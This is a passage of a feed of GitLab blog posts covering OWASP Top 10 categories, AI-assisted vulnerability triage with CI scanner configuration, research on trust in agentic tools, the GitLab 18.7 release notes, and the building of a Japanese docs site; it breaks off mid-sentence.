recovery mechanisms exploited * Multi-factor authentication bypass ##### Notable CWEs * CWE-287: Improper Authentication * CWE-306: Missing Authentication for Critical Function * CWE-521: Weak Password Requirements ### A08: Software or Data Integrity Failures ##### What it is Code and infrastructure failing to protect against invalid or untrusted code/data being treated as trusted and valid. ##### Impact on your system * Unsigned updates allowing malicious code injection * Insecure deserialization leading to remote code execution * CI/CD pipeline compromise * Auto-update mechanisms exploited * Tampered software artifacts ##### Notable CWEs * CWE-345: Insufficient Verification of Data Authenticity * CWE-346: Origin Validation Error * CWE-347: Improper Verification of Cryptographic Signature ### A09: Security Logging & Alerting Failures ##### What it is Insufficient logging and monitoring with inadequate alerting, which makes rapid response difficult. ##### Impact on your system * Attacks go undetected for extended periods * Breach investigation becomes impossible * Compliance violations from lack of audit trails * Delayed incident response * Inability to determine scope of compromise ##### Notable CWEs * CWE-117: Improper Output Neutralization for Logs * CWE-532: Insertion of Sensitive Information into Log File * CWE-778: Insufficient Logging ### A10: Mishandling of Exceptional Conditions ##### What it is Programs failing to prevent, detect, and respond to unusual and unpredictable situations, which leads to crashes, unexpected behavior, or vulnerabilities. ##### Impact on your system * Information disclosure through verbose error messages * Denial of service from unhandled exceptions * State corruption from improper error handling * Race conditions exploited * Systems failing open instead of closed * Application crashes exposing sensitive data ##### Notable CWEs * CWE-248: Uncaught Exception * CWE-390: Detection of Error Condition Without Action * CWE-391: Unchecked Error Condition ## Prevention and remediation best practices GitLab provides tools to enable you to not only quickly find and remediate vulnerabilities within the OWASP Top 10, but also to prevent them from making it into your production system. By following these best practices you can enhance and maintain your security posture: #### Automated security scanning for all repositories * Perform SAST Scanning to detect insecure design patterns like plaintext password storage, inadequate error handling, and missing encryption during code review, catching design flaws early in the development lifecycle. * Perform Secret Detection to identify credentials in configuration files, environment variables, and code, preventing plaintext password storage and ensuring secrets are properly managed through GitLab's CI/CD variables with masking and encryption. * Perform DAST Scanning to detect broken access control vulnerabilities * Perform Dependency Scanning to scan project dependencies against vulnerability databases, identifying known CVEs in direct and transitive dependencies across multiple package managers (npm, pip, Maven, etc.). * Perform Container Scanning to analyze Docker images for vulnerable base layers and packages, ensuring container supply chain security before deployment. * Perform IaC Scanning to check your infrastructure definition files for known vulnerabilities. * Leverage API Security Tools to secure and protect web APIs from unauthorized access, misuse, and attacks. * Perform Web API Fuzz Testing to discover bugs and potential vulnerabilities that other QA processes might miss. _View vulnerabilities detected in MR with diff from feature branch to main branch._ #### Understand your security posture * Generate a software bill of materials (SBOM) for complete dependency visibility and compliance requirements. * Leverage the Vulnerability Report to sort through and triage vulnerabilites via consolidated view of security vulnerabilities found in your codebase. * Quickly take action on vulnerabilities using detailed remdiation guidance and risk assessment data. * Use Security Iventory to visualize which assets you need to secure and understand the actions you need to take to improve security. * Leverage Compliance Center to manage compliance standards adherence reporting, violations reporting, and compliance frameworks. _Use Security Inventory to viewing enabled security scanners and vulnerabilities._ #### Set up prevention and maintain documentation * Configure Security Policies to block merges or deployments when high-severity vulnerabilities are detected in dependencies, enforcing security standards automatically. * Use Compliance Frameworks to enforce organizational security standards through automated policy checks that verify encryption requirements, credential management practices, and secure workflow implementations are followed. * Use GitLab Wiki and repository documentation to maintain security design principles, approved patterns, and architectural decision records that guide developers toward secure-by-design implementations. * Implement merge request approval rules requiring security architect review for features involving authentication, authorization, encryption, or sensitive data handling, ensuring design-level security validation. * Create tests to verify input validation and allowlist approaches for file paths * Use GitLab Issues and Epics to document security requirements and threat models during the design phase, creating a traceable record of security decisions and ensuring security considerations are addressed before implementation begins. _View and set Security Policies scoped to instance, group, or project._ #### Leverage AI * Use Code Suggestions for proactive guidance during development, suggesting secure design patterns like proper password hashing (bcrypt, Argon2), encrypted storage mechanisms, and appropriate error handling that doesn't leak sensitive information. * Use Security Analyst Agent to review detected insecure design vulnerabilities in context, explaining the architectural implications, assessing risk based on your application's threat model, and providing remediation strategies that address root design flaws rather than just symptoms. * Review your code using AI to help ensure consistent code review standards in your project. _Leverage Security Analyst Agent to quickly triage and assess security vulnerabilities._ ## Key takeaways for development teams * **Supply chain security is critical** : With A03's addition and high-impact scores, securing your software supply chain is no longer optional. Implement SBOM tracking, dependency scanning, and integrity verification throughout your pipeline. * **Configuration matters more than ever** : The rise to #2 shows that configuration-based security is now a primary attack vector. Automate configuration verification and implement IaC with security baked in. * **Traditional threats persist** : While Injection and Cryptographic Failures dropped in ranking, they remain critical. Don't deprioritize them just because they've fallen on the list. * **Error handling is security** : The new A10 category emphasizes that how your application handles failures is a security concern. Implement secure error handling from the start. * **Testing must evolve** : The expanded CWE coverage (589 vs. 400 in 2021) means testing strategies must be comprehensive. Combine SAST, DAST, source code analysis, and manual penetration testing for effective coverage. > Explore our GitLab Security and Governance Solutions and security scanning documentation to start strengthening your security posture today.
about.gitlab.com
January 7, 2026 at 10:51 PM
AI-powered vulnerability triaging with GitLab Duo Security Agent
Security vulnerabilities are discovered constantly in modern applications. Development teams often face hundreds or thousands of findings from security scanners, making it challenging to identify which vulnerabilities pose the greatest risk and should be prioritized. This is where effective vulnerability triaging becomes essential. In this article, we'll explore how GitLab's integrated security scanning capabilities combined with the GitLab Duo Security Analyst Agent can transform vulnerability management from a time-consuming manual process into an intelligent, efficient workflow. > 💡 Join GitLab Transcend on February 10 to learn how agentic AI transforms software delivery. Hear from customers and discover how to jumpstart your own modernization journey. Register now. ## What is vulnerability triaging? Vulnerability triaging is the process of analyzing, prioritizing, and deciding how to address security findings discovered in your applications. Not all vulnerabilities are created equal — some represent critical risks requiring immediate attention, while others may be false positives or pose minimal threat in your specific context. Traditional triaging involves: * **Reviewing scan results** from multiple security tools * **Assessing severity** based on CVSS scores and exploitability * **Understanding context** such as whether vulnerable code is actually reachable * **Prioritizing remediation** based on business impact and risk * **Tracking resolution** through to deployment This process becomes overwhelming when dealing with large codebases and frequent scans. GitLab addresses these challenges through integrated security scanning and AI-powered analysis. ## How to add integrated security scanners in GitLab GitLab provides built-in security scanners that integrate seamlessly into your CI/CD pipelines. These scanners run automatically during pipeline execution and populate GitLab's Vulnerability Report with findings from the default branch. ### Available security scanners GitLab offers the following security scanning capabilities: * **Static Application Security Testing (SAST)** : Analyzes source code for vulnerabilities * **Dependency Scanning** : Identifies vulnerabilities in project dependencies * **Container Scanning** : Scans Docker images for known vulnerabilities * **Dynamic Application Security Testing (DAST)** : Tests running applications for vulnerabilities * **Secret Detection** : Finds accidentally committed secrets and credentials * **Infrastructure-as-Code (IaC) Scanning** : Analyzes infrastructure as code for misconfigurations * **API Security Testing** : Test web APIs to help discover bugs and potential security issues * **Web API Fuzzing** : Passes unexpected values to API operation parameters to cause unexpected behavior and errors in the backend ### Example: Adding SAST and Dependency Scanning To enable security scanning, add the scanners to your `.gitlab-ci.yml` file. In this example, we are including SAST and Dependency Scanning templates which automatically run those scanners on the test stage. Each scanner can be overwritten using variables (which differ for each scanner). For example, the `SAST_EXCLUDED_PATHS` variable tells SAST to skip the directories/files provided. Security jobs can be further overwritten using the GitLab Job Syntax. include: - template: Security/SAST.gitlab-ci.yml - template: Security/Dependency-Scanning.gitlab-ci.yml stages: - test variables: SAST_EXCLUDED_PATHS: "spec/, test/, tests/, tmp/" ### Example: Adding Container Scanning GitLab provides a built-in container registry where you can store container images for each GitLab project. To scan those containers for vulnerabilities, you can enable container scanning. This example shows how a container is built and pushed in the `build-container` job running in the `build` stage and how it is then scanned in the same pipeline in the `test` stage: include: - template: Security/Container-Scanning.gitlab-ci.yml stages: - build - test build-container: stage: build variables: IMAGE: $CI_REGISTRY_IMAGE/$CI_COMMIT_REF_SLUG:$CI_COMMIT_SHA before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - docker build -t $IMAGE . - docker push $IMAGE container_scanning: variables: CS_IMAGE: $CI_REGISTRY_IMAGE/$CI_COMMIT_REF_SLUG:$CI_COMMIT_SHA Once configured, these scanners execute automatically in your pipeline and report findings to the Vulnerability Report. **Note:** Although not covered in this blog, in merge requests, scanners show the diff of vulnerabilities from a feature branch to the target branch. Additionally, granular security policies can be created to prevent vulnerable code from being merged (without approval) if vulnerabilities are detected, as well as force scanners to run, regardless of how the `.gitlab-ci.yml` is defined. ## Triaging using the Vulnerability Report and Pages After scanners run, GitLab aggregates all findings in centralized views that make triaging more manageable. ### Accessing the Vulnerability Report Navigate to **Security & Compliance > Vulnerability Report** in your project or group. This page displays all discovered vulnerabilities with key information: * Severity levels (Critical, High, Medium, Low, Info) * Status (Detected, Confirmed, Dismissed, Resolved) * Scanner type that detected the vulnerability * Affected files and lines of code * Detection date and pipeline information ### Filtering and organizing vulnerabilities The Vulnerability Report provides powerful filtering options: * Filter by severity, status, scanner, identifier, and reachability * Group by severity, status, scanner, OWASP Top 10 * Search for specific CVEs or vulnerability names * Sort by detection date or severity * View trends over time with the security dashboard ### Manual workflow triage Traditional triaging in GitLab involves: 1. **Reviewing each vulnerability** by clicking into the detail page 2. **Assessing the description** and understand the potential impact 3. **Examining the affected code** through integrated links 4. **Checking for existing fixes** or patches in dependencies 5. **Setting status** (Confirm, Dismiss with reason, or create an issue) 6. **Assigning ownership** for remediation This is an example of vulnerability data provided to allow for triage including the code flow: When on the vulnerability data page, you can select **Edit vulnerability** to change its status as well as provide a reason. Then you can create an issue and assign ownership for remediation. While this workflow is comprehensive, it requires security expertise and can be time-consuming when dealing with hundreds of findings. This is where GitLab Duo Security Analyst Agent, part of GitLab Duo Agent Platform, becomes invaluable. ## About Security Analyst Agent and how to set it up GitLab Duo Security Analyst Agent is an AI-powered tool that automates vulnerability analysis and triaging. The agent understands your application context, evaluates risk intelligently, and provides actionable recommendations. ### What Security Analyst Agent does The agent analyzes vulnerabilities by: * **Evaluating exploitability** in your specific codebase context * **Assessing reachability** to determine if vulnerable code paths are actually used * **Prioritizing based on risk** rather than just CVSS scores * **Explaining vulnerabilities** in clear, actionable language * **Recommending remediation steps** specific to your application * **Reducing false positives** through contextual analysis ### Prerequisites To use Security Analyst Agent, you need: * GitLab Ultimate subscription with GitLab Duo Agent Platform enabled * Security scanners configured in your project * At least one vulnerability in your Vulnerability Report ### Enabling Security Analyst Agent Security Analyst Agent is a foundational agent. Unlike the general-purpose GitLab Duo agent, foundational agents understand the unique workflows, frameworks, and best practices of their specialized domains. Foundational agents can be accessed directly from your project without any additional configuration. You can find Security Analyst Agent in the AI Catalog: To dive in and see the details of the agent, such as its system prompt and tools: 1. Navigate to **gitlab.com/explore/**. 2. Select **AI Catalog** from the side tab. 3. Select **Security Analyst Agent** from the list. The agent is integrated directly into your existing workflow without requiring additional configuration beyond the defined prerequistes. ## Using Security Analyst Agent to find most critical vulnerabilities Now let's explore how to leverage Security Analyst Agent to quickly identify and prioritize the vulnerabilities that matter most. ### Starting an analysis To start an analysis, navigate to your GitLab project (ensure it meets the prerequistes). Then you can open GitLab Duo Chat and select the **Security Agent**. From the chat, select the model to use with the agent and make sure to enable Agentic mode. A chat will open where you can engage with Security Analyst Agent by using the agent's conversational interface. This agent can perform: * **Vulnerability triage** : Analyze and prioritize security findings across different scan types. * **Risk assessment** : Evaluate the severity, exploitability, and business impact of vulnerabilities. * **False positive identification** : Distinguish genuine threats from benign findings. * **Compliance management** : Understand regulatory requirements and remediation timelines. * **Security reporting** : Generate summaries of security posture and remediation progress. * **Remediation planning** : Create actionable plans to address security vulnerabilities. * **Security workflow automation** : Streamline repetitive security assessment tasks. Additionally, these are the tools which Security Analyst Agent has at its disposal: For example, I can ask "**What are the most critical vulnerabilities and which vulnerabilities should I address first?** " to make it easy to determine what is important. The agent will respond as follows: ### Example queries for effective triaging Here are powerful queries to use with the Security Analyst Agent: **Identify critical issues:** "Show me vulnerabilities that are actively exploitable in our production code" **Focus on reachable vulnerabilities:** "Which high-severity vulnerabilities are in code paths that are actually executed?" **Understand dependencies:** "What are the most critical dependency vulnerabilities and are patches available?" **Get remediation guidance:** "Explain how to fix the SQL injection vulnerability in user authentication" You can also directly assign developers to vulnerabilities. ### Understanding agent recommendations When Security Analyst Agent analyzes vulnerabilities, it provides: **Risk assessment** : The agent explains why a vulnerability is critical beyond just the CVSS score, considering your application's specific architecture and usage patterns. **Exploitability analysis** : It determines whether vulnerable code is actually reachable and exploitable in your environment, helping filter out theoretical risks. **Remediation steps** : The agent provides specific, actionable guidance on how to fix vulnerabilities, including code examples when appropriate. **Priority ranking** : Instead of overwhelming you with hundreds of findings, the agent helps identify the top issues that should be addressed first. ### Real-world workflow example Here's how a typical triaging session might look: 1. **Start with the big picture** : "Analyze the security posture of this project and highlight the top 5 most critical vulnerabilities." 2. **Dive into specifics** : For each critical vulnerability identified, ask "Is this vulnerability actually exploitable in our application?" 3. **Plan remediation** : "What's the recommended fix for this SQL injection issue, and are there any side effects to consider?" 4. **Track progress** : After addressing critical issues, ask "What vulnerabilities should I prioritize next?" ### Benefits of agent-assisted triaging Using Security Analyst Agent transforms vulnerability management: * **Time savings** : Reduce hours of manual analysis to minutes of guided review * **Better prioritization** : Focus on vulnerabilities that actually pose risk to your specific application * **Knowledge transfer** : Learn security best practices through agent explanations * **Consistent standards** : Apply consistent triaging logic across all projects * **Reduced alert fatigue** : Filter noise and false positives effectively ## Get started today Vulnerability triaging doesn't have to be an overwhelming manual process. By combining GitLab's integrated security scanners with GitLab Duo Security Analyst Agent, development teams can quickly identify and prioritize the vulnerabilities that truly matter. The agent's ability to understand context, assess real risk, and provide actionable guidance transforms security scanning from a compliance checkbox into a practical, efficient part of your development workflow. Instead of drowning in hundreds of vulnerability reports, you can focus your energy on addressing the issues that actually threaten your application's security. Start by enabling security scanners in your GitLab pipelines, then leverage Security Analyst Agent to make intelligent, informed decisions about vulnerability remediation. Your future self — and your security team — will thank you. > **Ready to get started?** Check out the GitLab Duo Agent Platform documentation and security scanning documentation to begin transforming your vulnerability management workflow today.
about.gitlab.com
January 6, 2026 at 10:44 PM
Building trust in agentic tools: What we learned from our users
As AI agents become increasingly sophisticated partners in software development, a critical question emerges: How do we build lasting trust between humans and these autonomous systems? Recent research from GitLab's UX Research team reveals that trust in AI agents isn't built through dramatic breakthroughs, but rather through countless small interactions called inflection points that accumulate over time to create confidence and reliability. Our comprehensive study of 13 agentic tool users from companies of different sizes identified that adoption happens through "micro-inflection points," subtle design choices and interaction patterns that gradually build the trust needed for developers to rely on AI agents in their daily workflows. These findings offer crucial insights for organizations implementing AI agents in their DevSecOps processes. Traditional software tools earn trust through predictable behavior and consistent performance. AI agents, however, operate with a degree of autonomy that introduces uncertainty. **Our research shows that users don 't commit to AI tools through single "aha" moments. Instead, they develop trust through accumulated positive micro-interactions that demonstrate the agent understands their context, respects their guardrails, and enhances rather than disrupts their workflows.** This incremental trust-building is especially critical in DevSecOps environments where mistakes can impact production systems, customer data, and business operations. Each small interaction either reinforces or erodes the foundation of trust necessary for productive human-AI collaboration. ## Four pillars of trust in AI agents Our research identified four key categories of micro-inflection points that build user trust: 1. Safeguarding actions Trust begins with safety. Users need confidence that AI agents won't cause irreversible damage to their systems. Essential safeguards include: * **Confirmation dialogs for critical changes:** Before executing operations that could affect production systems or delete data, agents should pause and seek explicit approval * **Rollback capabilities:** Users must know they can undo agent actions if something goes wrong * **Secure boundaries:** For organizations with compliance requirements, agents must respect data residency and security policies without constant manual oversight 2. Providing transparency Users can't trust what they can't understand. Effective AI agents maintain visibility through: * **Real-time progress updates:** Especially crucial when user attention might be needed * **Action explanations:** Before executing high-stakes operations, agents should clearly communicate their planned approach * **Clear error handling:** When issues arise, users need immediate alerts with understandable error messages and recovery paths This transparency transforms AI agents from mysterious black boxes into comprehensible partners whose logic users can follow and verify. 3. Remembering context Nothing erodes trust faster than having to repeatedly teach an AI agent the same information. Trust-building agents demonstrate memory through: * **Preference retention:** Accepting and applying user feedback about coding styles, deployment patterns, or workflow preferences * **Context awareness:** Remembering previous instructions and project-specific requirements * **Adaptive learning:** Evolving based on user corrections without requiring explicit reprogramming Our research participants consistently highlighted frustration with tools that couldn't remember basic preferences, forcing them to provide the same guidance repeatedly. 4. Anticipating needs Trust emerges when AI agents proactively support user workflows. Agents could support the user in the following ways: * **Pattern recognition:** Learning user routines and predicting tasks based on time of day or project context * **Intelligent agent selection:** Automatically recognizing which specialized agents are most relevant for specific tasks * **Environment analysis:** Understanding coding environments, dependencies, and project structures without explicit configuration These anticipatory capabilities transform AI agents from reactive tools into proactive partners that reduce cognitive load and streamline development processes. ## Implementing trust-building features For organizations deploying AI agents, our research suggests several practical implementations: * **Start with low-risk environments:** Allow users to build trust gradually by beginning with non-critical tasks. As confidence grows through positive micro-interactions, users naturally expand their reliance on AI capabilities. * **Design for continuous orchestration of agents, which includes intervention:** Unlike traditional automation, AI agents should know when to pause and seek human input. This intervention assures users they maintain ultimate control while benefiting from AI efficiency. Agents also need autonomy level controls so that they can calibrate autonomy for different types of action, in different contexts. * **Maintain audit trails:** Every agent action should be traceable, allowing users to understand not just what happened, but why the agent made specific decisions. * **Personalize the experience:** Agents that adapt to individual user preferences and team workflows create stronger trust bonds than one-size-fits-all solutions. ## The compounding impact of trust Our findings reveal that trust in AI agents follows a compound growth pattern. Each positive micro-interaction makes users slightly more willing to rely on the agent for the next task. Over time, these small trust deposits accumulate into deep confidence that transforms AI agents from experimental tools into essential development partners. This trust-building process is delicate – a single significant failure can erase weeks of accumulated confidence. That's why consistency in these micro-inflection points is crucial. Every interaction matters. Supporting these micro-inflection points is a cornerstone of having software teams and their AI agents collaborate at enterprise scale with intelligent orchestration. ## Next steps Building trust in AI agents requires intentional design focused on user needs and concerns. Organizations implementing agentic tools should: * Audit their AI agents for trust-building micro-interactions * Prioritize transparency and user control in agent design * Invest in memory and learning capabilities that reduce user friction * Create clear escalation paths for when agents encounter uncertainty ## Key takeaways * Trust in AI agents builds incrementally through micro-inflection points rather than breakthrough moments * Four key categories drive trust: safeguarding actions, providing transparency, remembering context, and anticipating needs * Small design choices in AI interactions have compound effects on user adoption and long-term reliance * Organizations must intentionally design for trust through consistent, positive micro-interactions **Help us learn what matters to you:** Your experiences and insights are invaluable in shaping how we design and improve agentic interactions. Join our research panel to participate in upcoming studies. **Explore GitLab’s agents in action:** GitLab Duo Agent Platform extends AI's speed beyond just coding to your entire software lifecycle. With your workflows defining the rules, your context maintaining organizational knowledge, and your guardrails ensuring control, teams can orchestrate while agents execute across the SDLC. Visit the GitLab Duo Agent Platform site to discover how intelligent orchestration can transform your DevSecOps journey. Whether you're exploring agents for the first time or looking to optimize your existing implementations, we believe that understanding and designing for trust is the key to successful adoption. Let's build that future together!
about.gitlab.com
January 5, 2026 at 10:48 PM
GitLab 18.7: Advancing AI automation, governance, and developer experience
GitLab 18.7 delivers development, operations, and security capabilities that strengthen control, improve consistency, and build confidence as teams integrate AI further into their workflows. These improvements arrive as GitLab approaches a major milestone. GitLab Duo Agent Platform will reach general availability in January 2026 with our 18.8 release, pending we continue to meet the exceptionally high quality standards we set for ourselves in service to our customers worldwide across all industries. GitLab Duo Agent Platform's GA is designed to introduce a unified, governed way for organizations to orchestrate agentic AI across their software lifecycle. With foundational agents, custom agents, and automated flows working together inside GitLab, teams will be able to adopt agentic workflows that help accelerate work while staying aligned to organizational standards. At GA, we also plan to include expanded AI Catalog functionality, stronger administrative controls, reliability enhancements, and a flexible usage-based billing model designed to provide flexibility for agentic AI usage across many roles and projects. The 18.7 release adds important building blocks to support GitLab Duo Agent Platform’s upcoming GA. New automation features, stronger governance controls, and enhancements across security and pipeline authoring help teams streamline their work and lay the groundwork for an even more reliable agentic experience in 18.8 and beyond. > On February 10, 2026, we will host a global launch event that brings our vision of GitLab as the intelligent orchestration platform to life, where software teams and their AI agents stay in flow. You will hear how customers are tackling the AI paradox in software delivery, see intelligent orchestration in action across DevSecOps workflows, and get a jump start on what this next chapter means for your own modernization journey. Reserve your spot to see how GitLab’s next chapter comes together. **Here 's what is new in 18.7:** ## GitLab Duo Agent Platform As more teams bring AI into their development and security workflows, GitLab continues to focus on making adoption powerful and predictable. The updates in 18.7 strengthen the foundation for guided, governed AI experiences that will become fully realized when GitLab Duo Agent Platform reaches GA, as planned for 18.8. **Custom Flows** Custom Flows introduce a new way for teams to automate multistep workflows using YAML-defined sequences that orchestrate agents to complete repetitive development tasks. Custom Flows help eliminate manual effort for scenarios that follow predictable patterns — such as diagnosing and fixing failed pipelines, updating dependencies, or running policy checks when reviewers are assigned. Instead of handling these tasks interactively, teams can define flows that automatically trigger from GitLab events like mentions and assignments. This capability supports developers who want tailored automations for their own projects, as well as administrators who need consistent, organization-wide workflows for compliance and operational efficiency. **SAST False Positive Detection Flow** AI-powered false positive management for Static Application Security Testing (SAST) works to introduce a faster, more accurate way for teams to assess and act on potential false positives. GitLab now uses AI to help identify which findings may be false positives earlier in the review process, reducing the time developers and security teams spend triaging noise. Users can see an overview of how many vulnerabilities may warrant review, track their analysis progress, and dismiss false positives directly from the vulnerability report. Once dismissed, these findings stay dismissed across future pipelines and continue to reflect the correct dismissed status in merge request widgets. This assists with a consistent and reliable signal as code evolves and helps teams focus on real risks, streamline remediation, and cut down on unnecessary security review cycles. **Custom Agent Versioning** Custom Agent Versioning gives teams control over which version of an AI Catalog agent or flow they use in their projects. Instead of automatically inheriting updates from the creator, GitLab now pins each project to the exact version of the agent and flow enabled for the team. This helps prevent breaking changes, security risks, and workflow disruptions, especially in production pipelines or security-sensitive environments. Teams can upgrade when they choose, test new versions in staging before promoting them, and clearly see which version is running to avoid confusion. It also enables safer customization by letting users fork an agent at a specific version and evolve it independently. The result is a more predictable, stable, and secure way to adopt custom agents across development and CI/CD workflows. **New Settings for Foundational Agents** Admins now have the ability to turn foundational agents on or off, giving teams greater control over how AI is used across their organization. With this update, admins can enable or disable these agents at the instance or group level, choose default availability, and control how new agents are introduced while still providing access to the core agent. The result is more flexible AI adoption with the governance, consistency, and control enterprise teams need. **Data Analyst Agent** The Data Analyst Agent gives teams a simple way to explore GitLab data using natural language, automatically generating GitLab Query Language (GLQL) queries, retrieving relevant information, and presenting clear insights without requiring dashboards or manual query writing. Users can analyze work volume, understand team activity, identify development trends, monitor issue and merge request status, and quickly discover work items by labels, authors, milestones, or other criteria. It also creates reusable GLQL queries that can be embedded anywhere GitLab Flavored Markdown is supported, making it easier to share findings and answer everyday questions about project activity directly within GitLab. ## Core DevOps Innovations with GitLab Duo Agent Platform are most effective when the underlying DevOps experience is equally streamlined and dependable. The improvements in 18.7 to core GitLab workflows help ensure that automation, pipelines, and reusable components operate with highest levels of clarity and consistency. **Dynamic Input Selection in GitLab Pipelines** Dynamic Input Selection in GitLab Pipelines introduces a more intuitive way to trigger pipelines through dynamic, cascading dropdown fields in the GitLab UI. This allows cross-functional teams to run pipelines without editing YAML or relying on developers, while ensuring that only valid, context-aware options are shown as they make selections. The feature supports complex workflows, assists with reducing misconfigured runs, and removes a key blocker for teams migrating from Jenkins Active Choice, helping organizations standardize their CI/CD processes entirely on GitLab. **CI/CD Catalog Publication Guardrails** Administrators of GitLab Self-Managed and GitLab Dedicated can now control which projects are allowed to publish components to the CI/CD Catalog. This new setting helps organizations maintain a curated, trusted ecosystem by ensuring only approved sources can add components. It strengthens governance for enterprise customers who want to preserve control over their CI/CD landscape while still enabling teams to discover and reuse sanctioned components. ## Platform Security As automation and pipeline workflows become more efficient, it remains essential that teams maintain strong visibility and control over how code changes meet organizational standards. The Platform Security update in 18.7 reinforces this balance by giving teams a more flexible way to introduce and refine policy guidance without interrupting delivery. **Warn Mode for MR Approval Policies** Warn Mode for MR Approval Policies allows violations to be surfaced without blocking merges, giving teams a lower-friction way to introduce or adjust policies while assessing their impact before full enforcement. It also supports a guidance-based approach, where developers can review or dismiss violations with all actions audited to help AppSec refine policy effectiveness. Beyond merge requests, violations already present or introduced into the default branch now appear with a visual badge in the Vulnerability Report, making it easier to identify and prioritize issues that break policy. ## Elevating how teams build, secure, and deliver software The 18.7 release is about strengthening the foundation for reliable, flexible automation across your GitLab environment. GitLab Premium and Ultimate users can start using these capabilities today on GitLab.com and self-managed environments, with availability for GitLab Dedicated customers planned for next month. GitLab Duo Agent Platform is currently in **beta** — enable beta and experimental features to experience how full-context AI can transform the way your teams build software. New to GitLab? Start your free trial and see why the future of development is AI-powered, secure, and orchestrated through the world’s most comprehensive DevSecOps platform. _**Note:** Platform capabilities that are in beta are available as part of the GitLab Beta program. They are free to use during the beta period, and when generally available, they will be made available with a paid add-on option for GitLab Duo Agent Platform._ ### Stay up to date with GitLab To make sure you’re getting the latest features, security updates, and performance improvements, we recommend keeping your GitLab instance up to date. The following resources can help you plan and complete your upgrade: * Upgrade Path Tool – enter your current version and see the exact upgrade steps for your instance * Upgrade Documentation – detailed guides for each supported version, including requirements, step-by-step instructions, and best practices By upgrading regularly, you’ll ensure your team benefits from the newest GitLab capabilities and remains secure and supported. For organizations that want a hands-off approach, consider GitLab’s Managed Maintenance service. With Managed Maintenance, your team stays focused on innovation while GitLab experts keep your Self-Managed instance reliably upgraded, secure, and ready to lead in DevSecOps. Ask your account manager for more information. _This blog post contains "forward‑looking statements" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption "Risk Factors" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law._
about.gitlab.com
December 18, 2025 at 10:42 PM
How we built and automated our new Japanese GitLab Docs site
Today we are thrilled to announce the release of GitLab product documentation in Japanese at docs.gitlab.com/ja-jp. This major step marks our first move toward making GitLab's extensive documentation accessible to our users worldwide. ## The unique challenge of the Japanese market Japan represents one of the world's largest economies and is a critical market for enterprise software. However, it also presents a distinctive challenge: despite its technological sophistication and massive developer community, English proficiency remains a significant barrier for many users. Japan's developers and DevSecOps teams often face challenges with English-only documentation, as indicated by the country's ranking on the EF English Proficiency Index. This language barrier can significantly impact the speed of learning and ultimately influence the decision to evaluate, adopt, and champion a platform within Japanese organizations. We've heard directly from our Japanese customers and partners that English-only documentation wasn't merely an inconvenience, it was a barrier preventing them from getting the most out of GitLab. The impact rippled through every stage of the user journey: From initial evaluation where teams struggled to assess GitLab's capabilities, to daily operations where finding solutions took longer than necessary, to staying current with new features and best practices. In a market as competitive and mature as in Japan, this language barrier directly affected GitLab's market penetration. When Japanese companies evaluate enterprise software, the availability of comprehensive Japanese documentation signals long-term commitment to the market. It demonstrates that a provider isn't just making a token effort, but is genuinely invested in supporting Japanese users throughout their entire journey. To address this challenge and demonstrate our commitment to the Japanese market, we built localization infrastructure from the ground up, integrating with how we create and maintain documentation at GitLab. ## Localization built on docs-as-code principles GitLab's documentation is treated like any other code contribution, residing alongside product code in GitLab projects and managed via merge requests. This system ensures documentation is version-controlled, collaboratively reviewed, and automatically tested through CI/CD pipelines, which includes checks for issues with language, formatting, and links. Both the English and Japanese documentation sites are dynamically generated using the Hugo static site generator and deployed after merging changes, guaranteeing users always access the latest information. The documentation is extensive and comprehensive, drawing content from various source projects, including GitLab, GitLab Runner, Omnibus GitLab, GitLab Charts, GitLab Operator, and GitLab CLI (glab) (see architecture for details). This sheer scale and rapid update velocity presented a significant localization challenge. To keep pace with the continuous evolution of these source English projects, we had to design a localization infrastructure for our GitLab product documentation that could handle these unique complexities and provide an enterprise-grade solution for a fully localized site, all while adhering to our CI/CD pipeline requirements. ## How we localized GitLab Documentation For our initial Japanese localization, we adopted a strategy of integrating new folders within our existing English content structure. Specifically, we introduced `doc-locale/ja-jp` folders within each project that stores source Markdown files. This architecture keeps the translations right alongside their source content while maintaining a clear organizational separation. Not only that, but it also enables us to apply the same robust version control, established review and collaboration workflows, and even some of the automated quality checks used for our English documentation to the translated content. This internationalization infrastructure built for Japanese documentation provides a scalable foundation for future language expansion. With the architecture, tooling, and processes now in place, we are well-positioned to support additional languages as we continue our commitment to making GitLab accessible to users worldwide. ## An AI-assisted translation workflow that balances speed and quality We adopted a strategic, phased approach to processing the content through translation, prioritizing pages based on their English-language page views. The highest-traffic pages underwent AI translation first, followed by comprehensive human linguistic review, and we intentionally paused subsequent phases until these priority pages completed the full human review cycle. This deliberate sequencing allowed us to build a robust, curated translation memory and termbase from our most important content. These linguistic assets accelerated and improved quality across all remaining content. In parallel, this initial phase served as our testing ground on the technical infrastructure on the GitLab side. We used it to iterate and reinforce our CI/CD pipelines, refine our translation and post-editing AI scripts, and solidify our Translation MR review process. To provide our international users with the most current documentation while guaranteeing high-quality translated content, we implemented an AI-assisted translation workflow with human post-editing, consisting of: * Phase 1: AI-powered translation. We built a custom AI translation system enriched with GitLab-specific context including style guides, GitLab UI content translations, terminology databases, and original file context. This system intelligently handles GitLab's specialized markdown syntax (GLFM) and protects elements like placeholder variables, alert boxes, Hugo shortcodes, and GitLab-specific references that standard translation tools can't process out of the box. * Phase 2: Human linguistic review. Professional Japanese translators specialized in technical content then review and refine the AI translations. They work with GitLab's Japanese style guide, translation memory, and terminology database to ensure accuracy, natural language flow, and cultural appropriateness. These human-reviewed translations progressively replace the AI versions on the site. ## Technical challenges and solutions Localizing GitLab's extensive documentation, while maintaining our docs-as-code principles and CI/CD-driven publishing workflow, required significant technical innovation. The challenges extended beyond translation itself: we needed to preserve complex markdown syntax, maintain automated testing standards, ensure seamless content fallbacks, and create sustainable processes for continuous updates across multiple source projects. The English **markdown file syntax complexity** led us to developing custom code and regex in our Translation Management System (TMS) to protect codeblocks, URLs, and other functional elements that should not be exposed for translation. Due to the dynamics of how the English content is generated, we established an **English fallback mechanism.** Essentially, when the Japanese translation is not ready yet, the localized site seamlessly displays English content with translated navigation and UI, preventing 404s and maintaining language context via Hugo’s rendering system. We enhanced the localized navigation and linking so that it adjusts dynamically and would persist the locale. We added 